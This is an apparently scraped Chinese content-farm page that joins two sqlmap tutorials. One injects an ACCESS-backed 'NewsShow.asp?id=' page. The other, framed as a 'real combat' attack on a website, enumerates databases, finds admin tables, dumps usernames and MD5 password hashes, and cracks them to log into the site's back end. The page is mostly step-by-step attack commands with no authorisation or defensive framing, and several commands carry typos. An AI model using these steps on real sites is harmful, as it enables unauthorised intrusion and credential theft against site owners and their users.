sqlmap怎么注入ACCESS数据库
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap怎么注入ACCESS数据库相关的知识,希望对你有一定的参考价值。
参考技术A 方法/步骤首先我们先来跑表
命令是sqlmap –u “url/NewsShow.asp?id=69” –tables
一路上大家遇到这个
可以直接选择回车
等到了这里
大家选择线程1到10
开始扫表。你也可以在出现admin这个表的时候按下ctrl+c就可以终止然后就获取表
然后我们直接再次输入命令sqlmap –u “url/NewsShow.asp?id=69” –colunmns –T admin
然后得到了里面的字段username password id
然后我们直接跑字段内容sqlmap –u “url/NewsShow.asp?id=69” –dumps –T admin –C “username,password”
然后一路还是回车。到了
还是选择线程1到10
最后跑出了用户名。密码
9
实战|SQL注入攻击网站
SQL注入
一:获取数据库类型
sqlmap -u http://xxx.com –dbs
获得的信息:linux服务器系统为cenos 5.10
Apacher php 的版本 数据库类型为sql
二,获取数据库中的数据库
sqlmap -u http:xxx.com --dbms mysql--level 3 –dbs
OK,当前数据库中有两个数据库,目测sq_kffc200为当前网站的系统!(做过网站都知道的)
三,
从当前数据库中获取表段
sqlmap -uhttp://www.xxx.com --dbmsmysql --level 3 -D sq_kyfc200 –tables
Ok 我们可以看到有很多表头 怎么办?
没事我们找关键字(含有admin开头的全部搞上去!)
四:获取admin表中的字段
sqlmap -u http://www.xxx.com--dbms mysql --level 3 -D sq_kyfc200 -T "boc_admin_user,boc_admin_user,ky_admin"–columns
获取到的表段:还是关键字password username 等
五,获取表和字中的密码:
sqlmap -uhttp://www.xxx.com --dbms mysql--level 3 -D sq_kyfc200 -T "boc_admin_user,boc_admin_user,ky_admin" -C"login_count,password,qq,tel" –dump
OK 获得MD5加密的密文 解密登录后台
获取更多原创教程 扫码关注即可
以上是关于sqlmap怎么注入ACCESS数据库的主要内容,如果未能解决你的问题,请参考以下文章